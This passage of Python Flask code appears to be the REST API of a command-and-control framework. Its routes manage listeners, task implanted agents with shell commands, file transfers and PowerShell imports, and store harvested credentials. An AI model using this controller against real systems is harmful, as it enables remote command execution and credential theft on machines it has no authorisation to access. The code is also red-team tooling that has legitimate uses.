listeners = [{'ID': active_listener.id, 'name': active_listener.name, 'module': active_listener.module,
'listener_type': active_listener.listener_type,
'listener_category': active_listener.listener_category,
'options': active_listener.options}]
return jsonify({'listeners': listeners})
@app.route('/api/listeners/<string:listener_name>', methods=['DELETE'])
def kill_listener(listener_name):
"""
Kills the listener specified by listener_name.
"""
if listener_name.lower() == "all":
active_listeners_raw = Session().query(models.Listener).all()
for active_listener in active_listeners_raw:
main.listeners.kill_listener(active_listener.name)
return jsonify({'success': True})
else:
if listener_name != "" and main.listeners.is_listener_valid(listener_name):
main.listeners.kill_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/disable', methods=['PUT'])
def disable_listener(listener_name):
"""
Disables the listener specified by listener_name.
"""
if listener_name != "" and main.listeners.is_listener_valid(listener_name):
main.listeners.disable_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found or already disabled' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/enable', methods=['PUT'])
def enable_listener(listener_name):
"""
Enable the listener specified by listener_name.
"""
if listener_name != "" and listener_name in main.listeners.get_inactive_listeners():
main.listeners.enable_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found or already enabled' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/edit', methods=['PUT'])
def edit_listener(listener_name):
"""
Edit listener specified by listener_name.
"""
if not request.json['option_name']:
return make_response(jsonify({'error': 'option_name not provided'}), 400)
if main.listeners.is_listener_valid(listener_name):
return make_response(jsonify({'error': 'Provided listener should be disabled'}), 400)
option_name = request.json['option_name']
option_value = request.json.get('option_value', '')
if listener_name in main.listeners.get_inactive_listeners():
# todo For right now, setting listener options via update does not go through the same validation and formatters
# that start_listener does. In order to do that requires some refactors on listeners.py to use the db better
# as a source of truth and not depend on all the in-memory objects.
success = main.listeners.update_listener_options(listener_name, option_name, option_value)
if success:
return jsonify({'success': True})
else:
# todo propagate the actual error with setting the value
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option_name, option_value)}), 400)
else:
return make_response(jsonify({'error': 'listener name %s not found or not inactive' % listener_name}), 404)
@app.route('/api/listeners/types', methods=['GET'])
def get_listener_types():
"""
Returns a list of the loaded listeners that are available for use.
"""
return jsonify({'types': list(main.listeners.loadedListeners.keys())})
@app.route('/api/listeners/options/<string:listener_type>', methods=['GET'])
def get_listener_options(listener_type):
"""
Returns JSON describing listener options for the specified listener type.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': 'listener type %s not found' % listener_type}), 404)
options = main.listeners.loadedListeners[listener_type].options
info = main.listeners.loadedListeners[listener_type].info
return jsonify({'listeneroptions': options, 'listenerinfo': info})
@app.route('/api/listeners/<string:listener_type>', methods=['POST'])
def start_listener(listener_type):
"""
Starts a listener with options supplied in the POST.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': 'listener type %s not found' % listener_type}), 404)
listener_name = request.json['Name']
dupe_check = Session().query(models.Listener).filter(models.Listener.name == listener_name).first()
if dupe_check:
return make_response(jsonify({'error': f'listener with name {listener_name} already exists'}), 400)
listenerObject = main.listeners.loadedListeners[listener_type]
# set all passed options
for option, values in request.json.items():
if isinstance(values, bytes):
values = values.decode('UTF-8')
returnVal = main.listeners.set_listener_option(listener_type, option, values)
if not returnVal:
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option, values)}), 400)
main.listeners.start_listener(listener_type, listenerObject)
# check to see if the listener was created
listenerID = main.listeners.get_listener_id(listener_name)
if listenerID:
return jsonify({'success': 'Listener %s successfully started' % listener_name})
else:
return jsonify({'error': 'failed to start listener %s' % listener_name})
@app.route('/api/agents', methods=['GET'])
def get_agents():
"""
Returns JSON describing all currently registered agents.
"""
active_agents_raw = Session().query(models.Agent).filter(models.Agent.killed == False).all()
agents = []
for active_agent in active_agents_raw:
agents.append(
{"ID": active_agent.id, "session_id": active_agent.session_id, "listener": active_agent.listener,
"name": active_agent.name, "language": active_agent.language,
"language_version": active_agent.language_version, "delay": active_agent.delay,
"jitter": active_agent.jitter, "external_ip": active_agent.external_ip,
"internal_ip": active_agent.internal_ip, "username": active_agent.username,
"high_integrity": int(active_agent.high_integrity or 0), "process_name": active_agent.process_name,
"process_id": active_agent.process_id, "hostname": active_agent.hostname,
"os_details": active_agent.os_details,
"session_key": str(active_agent.session_key),
"nonce": active_agent.nonce, "checkin_time": active_agent.checkin_time,
"lastseen_time": active_agent.lastseen_time, "parent": active_agent.parent,
"children": active_agent.children, "servers": active_agent.servers, "profile": active_agent.profile,
"functions": active_agent.functions, "kill_date": active_agent.kill_date,
"working_hours": active_agent.working_hours, "lost_limit": active_agent.lost_limit,
"stale": active_agent.stale, "notes": active_agent.notes, "architecture": active_agent.architecture,
"proxy": active_agent.proxy})
return jsonify({'agents': agents})
@app.route('/api/agents/active', methods=['GET'])
def get_active_agents():
"""
Returns JSON describing all currently registered agents.
"""
active_agents_raw = Session().query(models.Agent).filter(models.Agent.killed == False).all()
agents = []
for active_agent in active_agents_raw:
if active_agent.stale is False:
agents.append(
{"ID": active_agent.id, "session_id": active_agent.session_id, "listener": active_agent.listener,
"name": active_agent.name, "language": active_agent.language,
"language_version": active_agent.language_version, "delay": active_agent.delay,
"jitter": active_agent.jitter, "external_ip": active_agent.external_ip,
"internal_ip": active_agent.internal_ip, "username": active_agent.username,
"high_integrity": int(active_agent.high_integrity or 0), "process_name": active_agent.process_name,
"process_id": active_agent.process_id, "hostname": active_agent.hostname,
"os_details": active_agent.os_details,
"session_key": str(active_agent.session_key),
"nonce": active_agent.nonce, "checkin_time": active_agent.checkin_time,
"lastseen_time": active_agent.lastseen_time, "parent": active_agent.parent,
"children": active_agent.children, "servers": active_agent.servers, "profile": active_agent.profile,
"functions": active_agent.functions, "kill_date": active_agent.kill_date,
"working_hours": active_agent.working_hours, "lost_limit": active_agent.lost_limit,
"stale": active_agent.stale, "notes": active_agent.notes, "architecture": active_agent.architecture,
"proxy": active_agent.proxy})
return jsonify({'agents': agents})
@app.route('/api/agents/stale', methods=['GET'])
def get_agents_stale():
"""
Returns JSON describing all stale agents.
"""
agents_raw = Session().query(models.Agent).all()
stale_agents = []
for agent in agents_raw:
if agent.stale:
stale_agents.append(
{"ID": agent.id, "session_id": agent.session_id, "listener": agent.listener, "name": agent.name,
"language": agent.language, "language_version": agent.language_version, "delay": agent.delay,
"jitter": agent.jitter, "external_ip": agent.external_ip, "internal_ip": agent.internal_ip,
"username": agent.username, "high_integrity": int(agent.high_integrity or 0),
"process_name": agent.process_name, "process_id": agent.process_id, "hostname": agent.hostname,
"os_details": agent.os_details, "session_key": str(agent.session_key), "nonce": agent.nonce,
"checkin_time": agent.checkin_time, "lastseen_time": agent.lastseen_time, "parent": agent.parent,
"children": agent.children, "servers": agent.servers, "profile": agent.profile,
"functions": agent.functions, "kill_date": agent.kill_date, "working_hours": agent.working_hours,
"lost_limit": agent.lost_limit, "architecture": agent.architecture, "proxy": agent.proxy})
return jsonify({'agents': stale_agents})
@app.route('/api/agents/stale', methods=['DELETE'])
def remove_stale_agent():
"""
Removes all stale agents from the controller.
WARNING: doesn't kill the agent first! Ensure the agent is dead.
"""
agents_raw = Session().query(models.Agent).all()
for agent in agents_raw:
if agent.stale:
agent.killed = True
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>', methods=['DELETE'])
def remove_agent(agent_name):
"""
Removes an agent from the controller specified by agent_name.
WARNING: doesn't kill the agent first! Ensure the agent is dead.
"""
agent = Session().query(models.Agent).filter(models.Agent.name == agent_name).first()
if not agent:
return make_response(jsonify({'error': 'agent %s not found' % agent_name}), 404)
agent.killed = True
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>', methods=['GET'])
def get_agents_name(agent_name):
"""
Returns JSON describing the agent specified by agent_name.
"""
agent = Session().query(models.Agent).filter(models.Agent.name == agent_name).first()
if not agent:
return make_response(jsonify({'error': 'agent %s not found' % agent_name}), 404)
active_agent = []
active_agent.append(
{"ID": agent.id, "session_id": agent.session_id, "listener": agent.listener, "name": agent.name,
"language": agent.language, "language_version": agent.language_version, "delay": agent.delay,
"jitter": agent.jitter, "external_ip": agent.external_ip, "internal_ip": agent.internal_ip,
"username": agent.username, "high_integrity": int(agent.high_integrity or 0),
"process_name": agent.process_name,
"process_id": agent.process_id, "hostname": agent.hostname, "os_details": agent.os_details,
"session_key": str(agent.session_key),
"nonce": agent.nonce, "checkin_time": agent.checkin_time,
"lastseen_time": agent.lastseen_time, "parent": agent.parent, "children": agent.children,
"servers": agent.servers, "profile": agent.profile, "functions": agent.functions,
"kill_date": agent.kill_date, "working_hours": agent.working_hours,
"lost_limit": agent.lost_limit, "architecture": agent.architecture, "proxy": agent.proxy})
return jsonify({'agents': active_agent})
@app.route('/api/agents/<string:agent_name>/processes', methods=['GET'])
def get_host_process(agent_name):
"""
Gets the processes from the processes table for a given agent. Processes are stored at the host level,
so it looks up the host from the agent and then gets the processes for that host.
"""
agent = Session().query(models.Agent).filter(models.Agent.session_id == agent_name).first()
processes = []
if agent:
processes_raw: List[models.HostProcess] = Session().query(models.HostProcess).filter(models.HostProcess.host_id == agent.host_id).all()
for proc in processes_raw:
agent_session_id = None
if proc.agent:
agent_session_id = proc.agent.session_id
processes.append({'host_id': proc.host_id, 'process_id': proc.process_id,
'process_name': proc.process_name, 'agent_session_id': agent_session_id,
'architecture': proc.architecture, 'user': proc.user})
return {'processes': processes}
@app.route('/api/agents/<string:agent_name>/directory', methods=['POST'])
def scrape_agent_directory(agent_name):
directory = '/' if request.args.get('directory') is None else request.args.get('directory')
task_id = main.agents.add_agent_task_db(agent_name, "TASK_DIR_LIST", directory, g.user['id'])
return jsonify({'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/directory', methods=['GET'])
def get_agent_directory(agent_name):
# Would be cool to add a "depth" param
directory = '/' if request.args.get('directory') is None else request.args.get('directory')
found = Session().query(models.AgentFile).filter(and_(
models.AgentFile.session_id == agent_name,
models.AgentFile.path == directory)).first()
if not found:
return make_response(jsonify({'error': "Directory not found."}), 404)
agent_file_alias = aliased(models.AgentFile)
results = Session() \
.query(models.AgentFile.id.label("id"),
models.AgentFile.session_id.label("session_id"),
models.AgentFile.name.label("name"),
models.AgentFile.path.label("path"),
models.AgentFile.parent_id.label("parent_id"),
models.AgentFile.is_file.label("is_file"),
agent_file_alias.name.label("parent_name"),
agent_file_alias.path.label("parent_path"),
agent_file_alias.parent_id.label("parent_parent")) \
.select_from(models.AgentFile) \
.join(agent_file_alias,
models.AgentFile.parent_id == agent_file_alias.id) \
.filter(and_(models.AgentFile.session_id == agent_name, agent_file_alias.path == directory)) \
.all()
response = []
for result in results:
response.append({'id': result.id, 'session_id': result.session_id, 'name': result.name, 'path': result.path,
'parent_id': result.parent_id, 'is_file': result.is_file,
'parent_name': result.parent_name,
'parent_path': result.parent_path, 'parent_parent': result.parent_parent})
return jsonify({'items': response})
@app.route('/api/agents/<string:agent_name>/results', methods=['GET'])
def get_agent_results(agent_name):
"""
Returns JSON describing the agent's results and removes the result field
from the backend database.
"""
agent_task_results = []
query_options = [joinedload(models.Tasking.user)]
query = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name)
if request.args.get('include_full_input'):
query_options.append(undefer('input_full'))
if request.args.get('include_original_output'):
query_options.append(undefer('original_output'))
if request.args.get('updated_since'):
try:
since = request.args.get('updated_since')
since.replace('Z', '+00:00') # from isoformat does not recognize Z as utc
timestamp = datetime.fromisoformat(since).astimezone(timezone.utc)
query = query.filter(models.Tasking.updated_at > timestamp)
except ValueError as e:
return make_response({'error': f'Invalid ISO-8601 timestamp: {request.args.get("updated_since")}'}, 400)
query = query.options(*query_options)
tasks: List[models.Tasking] = query.all()
results = []
for task in tasks:
res = {'taskID': task.id, 'command': task.input,
'results': task.output, 'user_id': task.user_id,
'created_at': task.created_at, 'updated_at': task.updated_at,
'username': task.user.username, 'agent': task.agent_id}
if request.args.get('include_full_input'):
res['full_input'] = task.input_full
if request.args.get('include_original_output'):
res['original_output'] = task.original_output
results.append(res)
agent_task_results.append({"AgentName": agent_name, "AgentResults": results})
return jsonify({'results': agent_task_results})
@app.route('/api/agents/<string:agent_name>/task/<int:task_id>', methods=['GET'])
def get_task(agent_name, task_id):
"""
Returns json about a task from the database.
"""
task: models.Tasking = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name) \
.filter(models.Tasking.id == task_id) \
.options(joinedload(models.Tasking.user)) \
.first()
if task:
output = {'taskID': task.id, 'command': task.input, 'results': task.output,
'user_id': task.user_id, 'username': task.user.username, 'agent': task.agent_id}
if request.args.get('include_full_input'):
output['full_input'] = task.input_full
if request.args.get('include_original_output'):
output['original_output'] = task.original_output
return make_response(jsonify(output))
return make_response(jsonify({'error': 'task not found.'}), 404)
@app.route('/api/agents/<string:agent_name>/task/slim', methods=['GET'])
def get_agent_tasks_slim(agent_name):
"""
Provides a slimmed down view of agent tasks.
This is useful for when trying to get a quick list of actions taken on an agent without
all the overhead of the joined tables or tasking result bloat.
:param agent_name:
:return:
"""
query = Session().query(models.Tasking.id,
models.Tasking.input,
models.Tasking.agent_id,
models.Tasking.user_id,
models.User.username) \
.filter(models.Tasking.agent_id == agent_name) \
.join(models.User, models.Tasking.user_id == models.User.id) \
.order_by(models.Tasking.id.asc())
if request.args.get('num_results'):
query.limit(request.args.get('num_results'))
tasks = query.all()
agent_tasks = []
for task in tasks:
agent_tasks.append(
{'taskID': task.id, 'command': task.input,
'agent': task.agent_id, 'user_id': task.user_id,
'username': task.username})
return jsonify({'tasks': agent_tasks})
@app.route('/api/agents/<string:agent_name>/task', methods=['GET'])
def get_agent_tasks(agent_name):
"""
Returns json of last number of tasks tasks from an agent.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.args.get('num_results'):
return make_response(jsonify({'error': 'number of results to return not provided'}), 404)
num_results = int(request.args.get('num_results'))
tasks = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name) \
.options(joinedload(models.Tasking.user)) \
.order_by(models.Tasking.id.desc()) \
.limit(num_results).all()
agent_tasks = []
for task in tasks:
agent_tasks.append(
{'taskID': task.id, 'command': task.input, 'results': task.output,
'user_id': task.user_id, 'username': task.user.username, 'agent': task.agent_id})
return jsonify({'agent': agent_tasks})
@app.route('/api/agents/<string:agent_name>/results', methods=['DELETE'])
def delete_agent_results(agent_name):
"""
Removes the specified agent results field from the backend database.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
agent.results = ''
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/download', methods=['POST'])
def task_agent_download(agent_name):
"""
Tasks the specified agent to download a file
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json['filename']:
return make_response(jsonify({'error': 'file name not provided'}), 404)
file_name = request.json['filename']
msg = "Tasked agent to download %s" % file_name
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_DOWNLOAD', file_name, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/upload', methods=['POST'])
def task_agent_upload(agent_name):
"""
Tasks the specified agent to upload a file
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json['data']:
return make_response(jsonify({'error': 'file data not provided'}), 404)
if not request.json['filename']:
return make_response(jsonify({'error': 'file name not provided'}), 404)
file_data = request.json['data']
file_name = request.json['filename']
raw_bytes = base64.b64decode(file_data)
if len(raw_bytes) > 1048576:
return make_response(jsonify({'error': 'file size too large'}), 404)
msg = "Tasked agent to upload %s : %s" % (file_name, hashlib.md5(raw_bytes).hexdigest())
main.agents.save_agent_log(agent.session_id, msg)
data = file_name + "|" + file_data
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_UPLOAD', data, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/shell', methods=['POST'])
def task_agent_shell(agent_name):
"""
Tasks an the specified agent_name to execute a shell command.
Takes {'command':'shell_command'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
command = request.json['command']
if command == 'sysinfo':
task_id = main.agents.add_agent_task_db(agent_name, "TASK_SYSINFO")
else:
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, command)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SHELL", command, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/sleep', methods=['PUT'])
def set_agent_sleep(agent_name):
"""
Tasks the specified agent to sleep or change jitter
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json or 'delay' not in request.json or 'jitter' not in request.json:
return make_response(jsonify({'error': 'Jitter and sleep interval are not provided'}), 400)
agent_delay = int(request.json['delay'])
agent_jitter = float(request.json['jitter'])
if agent_delay >= 0:
agent.delay = agent_delay
else:
return make_response(jsonify({'error': 'Delay must be a positive integer'}), 400)
if agent_jitter >= 0 and agent_jitter <= 1:
agent.jitter = agent_jitter
else:
return make_response(jsonify({'error': 'Jitter must be between 0.0 and 1.0'}), 400)
if agent.language == 'powershell':
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_SHELL',
'Set-Delay ' + str(agent_delay) + ' ' + str(agent_jitter))
elif agent.language == 'python':
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (agent_delay, agent_jitter, agent_delay, agent_jitter))
elif agent.language == 'csharp':
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_SHELL',
'Set-Delay ' + str(agent_delay) + ' ' + str(agent_jitter))
Session().commit()
# dispatch this event
msg = "[*] Tasked agent to sleep delay/jitter {}/{}".format(agent_delay, agent_jitter)
main.agents.save_agent_log(agent.session_id, msg)
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/script_import', methods=['POST'])
def task_agent_script_import(agent_name):
"""
Imports a PowerShell script and keeps it in memory in the agent.
Takes {'script':'script_location'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
path = main.installPath + '/' + request.json['script']
if path != "" and os.path.exists(path):
with open(path, 'r') as open_file:
script_data = open_file.read()
# strip out comments and blank lines from the imported script
script_data = helpers.strip_powershell_comments(script_data)
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, script_data)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SCRIPT_IMPORT", script_data,
uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
else:
return make_response(jsonify({'error': 'Unable to find script'}))
@app.route('/api/agents/<string:agent_name>/script_command', methods=['POST'])
def task_agent_script_command(agent_name):
"""
"Execute a function in the currently imported PowerShell script."
Takes {'script':'scipt_command'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
command = request.json['script']
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, command)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SCRIPT_COMMAND", command, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/update_comms', methods=['PUT'])
def agent_update_comms(agent_name):
"""
Dynamically update the agent comms to another
Takes {'listener': 'name'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'listener' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "listener"'}), 400)
listener_name = request.json['listener']
if not main.listeners.is_listener_valid(listener_name):
return jsonify({'error': 'Please enter a valid listener name.'})
else:
active_listener = main.listeners.activeListeners[listener_name]
if active_listener['moduleName'] != 'meterpreter' or active_listener['moduleName'] != 'http_mapi':
listener_options = active_listener['options']
listener_comms = main.listeners.loadedListeners[active_listener['moduleName']].generate_comms(
listener_options, language="powershell")
main.agents.add_agent_task_db(agent_name, "TASK_UPDATE_LISTENERNAME", listener_options['Name']['Value'])
main.agents.add_agent_task_db(agent_name, "TASK_SWITCH_LISTENER", listener_comms)
msg = "Tasked agent to update comms to %s listener" % listener_name
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
else:
return jsonify(
{'error': 'Ineligible listener for updatecomms command: %s' % active_listener['moduleName']})
@app.route('/api/agents/<string:agent_name>/proxy', methods=['GET'])
def get_proxy_info(agent_name):
"""
Returns JSON describing the specified currently module.
"""
proxy_info = {'Name': 'Proxies',
'Author': 'Cx01N',
'Background': '',
'Comments': '',
'Description': '',
'options': {'Address': {'Description': 'Address for the proxy.',
'Required': True,
'Value': '',
'SuggestedValues': '',
'Strict': ''},
'Proxy_Type': {'Description': 'Type of proxy to be used.',
'Required': True,
'Value': '',
'SuggestedValues': ['SOCKS4', 'SOCKS5', 'HTTP', 'SSL', 'SSL_WEAK',
'SSL_ANON', 'TOR', 'HTTPS', 'HTTP_CONNECT',
'HTTPS_CONNECT'],
'Strict': True},
'Port': {'Description': 'Port number for the proxy.',
'Required': True,
'Value': '',
'SuggestedValues': '',
'Strict': ''}
}
}
return jsonify({'proxy': proxy_info})
@app.route('/api/agents/<string:agent_name>/proxy', methods=['PUT'])
def agent_update_proxy(agent_name):
"""
Dynamically update the agent proxy
Takes {'proxy': 'options'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'proxy' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "listener"'}), 400)
proxy_list = request.json['proxy']
for x in range(len(proxy_list)):
proxy_list[0]['proxytype'] = PROXY_NAME[proxy_list[0]['proxytype']]
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.proxy = proxy_list
Session().commit()
main.agents.add_agent_task_db(agent_name, "TASK_SET_PROXY", json.dumps(proxy_list))
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/killdate', methods=['PUT'])
def agent_kill_date(agent_name):
"""
Set an agent's killdate (01/01/2016)
Takes {'kill_date': 'date'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'kill_date' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "kill_date"'}), 400)
try:
kill_date = request.json['kill_date']
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.kill_date = kill_date
Session().commit()
# task the agent
main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-KillDate " + str(kill_date))
# update the agent log
msg = "Tasked agent to set killdate to " + str(kill_date)
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
except:
return jsonify({'error': 'Unable to update agent killdate'})
@app.route('/api/agents/<string:agent_name>/workinghours', methods=['PUT'])
def agent_working_hours(agent_name):
"""
Set an agent's working hours (9:00-17:00)
Takes {'working_hours': 'working_hours'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'working_hours' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "working_hours"'}), 400)
try:
working_hours = request.json['working_hours']
working_hours = working_hours.replace(",", "-")
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.working_hours = working_hours
Session().commit()
# task the agent
main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-WorkingHours " + str(working_hours))
# update the agent log
msg = "Tasked agent to set working hours to " + str(working_hours)
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
except:
return jsonify({'error': 'Unable to update agent working hours'})
@app.route('/api/agents/<string:agent_name>/rename', methods=['POST'])
def task_agent_rename(agent_name):
"""
Renames the specified agent.
Takes {'newname': 'NAME'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
new_name = request.json['newname']
try:
result = main.agents.rename_agent(agent_name, new_name)
if not result:
return make_response(jsonify({
'error': 'error in renaming %s to %s, new name may have already been used' % (
agent_name, new_name)}), 400)
return jsonify({'success': True})
except Exception:
return make_response(jsonify({'error': 'error in renaming %s to %s' % (agent_name, new_name)}), 400)
@app.route('/api/agents/<string:agent_name>/clear', methods=['POST', 'GET'])
def task_agent_clear(agent_name):
"""
Clears the tasking buffer for the specified agent.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
main.agents.clear_agent_tasks_db(agent_name)
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/kill', methods=['POST', 'GET'])
def task_agent_kill(agent_name):
"""
Tasks the specified agent to exit.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
# task the agent to exit
msg = "tasked agent %s to exit" % agent.session_id
main.agents.save_agent_log(agent.session_id, msg)
main.agents.add_agent_task_db(agent.session_id, 'TASK_EXIT', uid=g.user['id'])
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/notes', methods=['POST'])
def update_agent_notes(agent_name):
"""
Update notes on specified agent.
{"notes" : "notes here"}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'notes' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "notes"'}), 400)
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': f'Agent not found with name {agent_name}'}))
agent.notes = request.json['notes']
Session().commit()
return jsonify({'success': True})
@app.route('/api/creds', methods=['GET'])
def get_creds():
"""
Returns JSON describing the credentials stored in the backend database.
"""
credential_list = []
credentials_raw = Session().query(models.Credential).all()
for credential in credentials_raw:
credential_list.append({"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes})
return jsonify({'creds': credential_list})
@app.route('/api/creds/<int:uid>', methods=['GET'])
def get_cred(uid):
"""
Returns JSON describing the credentials stored in the backend database.
"""
credential = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if credential:
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
return make_response(jsonify({'error': f'Credential {uid} not found'}), 404)
@app.route('/api/creds', methods=['POST'])
def add_creds():
"""
Adds credentials to the database
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
required_fields = ["credtype", "domain", "username", "password", "host"]
optional_fields = ["OS", "notes", "sid"]
cred = request.json
# ensure every credential given to us has all the required fields
if not all(k in cred for k in required_fields):
return make_response(jsonify({'error': 'invalid credential fields'}), 400)
# ensure the type is either "hash" or "plaintext"
if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'):
return make_response(
jsonify({'error': 'invalid credential type in credtype, must be "hash" or "plaintext"'}), 400)
os = request.json.get('os', '')
notes = request.json.get('notes', '')
sid = request.json.get('sid', '')
credential = main.credentials.add_credential(
cred['credtype'],
cred['domain'],
cred['username'],
cred['password'],
cred['host'],
os,
sid,
notes
)
if credential:
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
return make_response(jsonify({'error': f'Error writing credential. Check you aren\'t writing a duplicate.'}), 400)
@app.route('/api/creds/<int:uid>', methods=['DELETE'])
def remove_cred(uid):
"""
Delete credential from database.
"""
cred = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if cred:
Session().delete(cred)
Session().commit()
return jsonify({"success": True})
return make_response(jsonify({'error': f'Credential {cred} not found'}), 404)
@app.route('/api/creds/<int:uid>', methods=['PUT'])
def edit_cred(uid):
"""
Edit credential in database
"""
if not request.json:
abort(400)
required_fields = ["credtype", "domain", "username", "password", "host"]
if not all(k in request.json for k in required_fields):
return make_response(jsonify({'error': 'invalid credential'}), 400)
# ensure the type is either "hash" or "plaintext"
if not (request.json['credtype'] == u'hash' or request.json['credtype'] == u'plaintext'):
return make_response(
jsonify({'error': 'invalid credential type, must be "hash" or "plaintext"'}), 400)
credential: models.Credential = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if credential:
credential.credtype = request.json['credtype']
credential.domain = request.json['domain']
credential.username = request.json['username']
credential.password = request.json['password']
credential.host = request.json['host']
credential.os = request.json.get('os', '')
credential.notes = request.json.get('notes', '')
credential.sid = request.json.get('sid', '')
Session().commit()
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
